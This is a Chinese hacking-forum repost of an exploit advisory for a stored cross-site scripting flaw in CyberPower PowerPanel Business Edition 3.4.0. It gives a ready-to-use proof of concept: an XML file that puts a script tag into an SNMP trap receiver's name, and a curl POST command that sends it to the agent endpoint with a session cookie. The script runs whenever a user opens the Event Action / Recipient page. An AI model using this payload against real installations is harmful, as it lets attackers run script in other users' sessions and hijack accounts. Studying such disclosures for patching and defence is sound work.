PowerPanel Business Edition - Cross-Site Scripting - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月5日2年前

# Exploit Title: PowerPanel Business Edition - Stored Cross Site Scripting (SNMP trap receivers)
# Google Dork: None
# Date: 6/29/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
# Version: 3.4.0
# Tested on: Ubuntu 16.04
# CVE : Pending

CyberPower PowerPanel Business Edition 3.4.0 contains a stored cross site scripting vulnerability.  The fields used to configure SNMP trap receivers are not being properly sanitized.  This allows an authenticated user to inject arbitrary javascript code, which will later be executed once a user returns to the Event Action / Recipient page.

To demonstrate the vulnerability, create a file named 'xss.xml' with the following contents:

<?xml version="1.0" encoding="UTF-8" ?>
<ppbe>
<target>
<command>action.notification.trapRecipient.setup</command>
</target>
<inquire>
<trapRecipientSetup>
<action>ADD</action>
<trapRecipient>
<name><script>alert(1)</script></name>
<status>true</status>
<type>1</type>
<ipAddress>127.0.0.1</ipAddress>
<community>public</community>
</trapRecipient>
</trapRecipientSetup>
</inquire>
</ppbe>

Now execute the following curl command to submit a POST request with the contents of the 'xss.xml' file:

curl -X POST -H 'Content-type: text/xml' -d @xss.xml --cookie "JSESSIONID=(A VALID SESSION ID)" http://(A VALID HOST):3052/agent/ppbe.xml

Visiting the Event Action / Recipient page will execute the posted javascript code.

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

PowerPanel Business Edition - Cross-Site Scripting

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索